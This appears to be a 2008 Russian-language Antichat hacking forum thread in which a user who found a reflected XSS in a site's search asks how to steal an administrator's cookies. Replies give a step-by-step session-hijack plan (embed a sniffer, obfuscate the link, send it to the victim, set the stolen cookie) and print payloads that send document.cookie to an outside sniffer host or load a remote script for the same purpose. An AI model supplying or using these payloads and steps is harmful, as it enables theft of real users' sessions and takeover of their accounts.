Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Xss в поиске...что дальше ? |
10.06.2008, 13:40
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Xss в поиске...что дальше ?
Здрасте 
Извините если ни там запостил тему,,,,нужна помошь ачатовцев
Вобщем есть сайт, там поиск, там есть XSS (активная вроде))
вобщем если в поиске ввести
"><script>alert('antichat.ru')</script>
и нажать НАЙТИ,,,,то вылезает окошко с надписью античат...
(тестировал в опере и осле 7)
Теперь вопрос:
Как получить куки пользователей если ксс в поиске 
Это вообще реально ?
Спасибо |
|
|
10.06.2008, 13:44
|
|
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350
Репутация:
412
|
|
Это посевная хсс а не активная .
|
|
|
|
10.06.2008, 13:46
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Тоесть если я напишу админу письмо:
Привет
у тебя поиск не работает ( =
Он зайдет в поиск...и как мне его куки своровать ?
Я толко этого не пойму...
|
|
|
|
10.06.2008, 13:48
|
|
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
Провел на форуме:
2352294
Репутация:
416
|
|
http://forum.antichat.ru/thread20140.html
|
|
|
|
10.06.2008, 13:50
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.
|
|
|
|
10.06.2008, 13:52
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
k0lbasa
Да я эту тему наизусть тебе могу рассказать ( =
Тоесть если у меня будет сайт:
мой_сайт.ру/xss.htm
в xss.htm код
Код HTML:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня
Разве такое сработает ?
|
|
|
|
10.06.2008, 13:52
|
|
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605
Репутация:
13
|
|
Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер
|
|
|
|
10.06.2008, 13:53
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
это пассивная
хэк
|
|
|
|
10.06.2008, 13:56
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Сообщение от ty13r
Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер
Как же такое сделать если ксс толко в поиске есть 
|
|
|
|
10.06.2008, 14:04
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ?
Если что-то в поиске искать, выводится так:
www.site.com/ssearch.php?q=antichat.ru
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
